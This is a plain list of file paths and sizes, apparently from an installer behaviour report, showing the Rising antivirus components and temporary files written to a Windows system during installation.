    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
    %Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
    %Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
    %Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
    %Program Files%\RsTest.ini (14 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
    %Program Files%\Rising\RSD\updater.exe (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
    %Program Files%\Rising\RSD\setup.dat (601 bytes)
    %Program Files%\Rising\RSD\rslang.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
    %Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
    %Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
    %Program Files%\Rising\RSD\comx3.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
    %Program Files%\Rising\RSD\os.xml (685 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
    %System%\drivers\protreg.sys (24 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
    %Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
    %Program Files%\Rising\RSD\update.xml (164 bytes)
    %Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
    %Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
    %Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
    %Program Files%\Rising\RSD\RsStub.exe (64 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
    %Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
    %Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
    %Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
    %Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
    %Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
    %Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
    %Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
    %Program Files%\Rising\RSD\localopt.dll (1425 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
    %Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
    %Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
    %Program Files%\Rising\RSD\Setup.exe (5441 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
    %Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
    %Program Files%\Rising\RSD\syslay.dll (601 bytes)
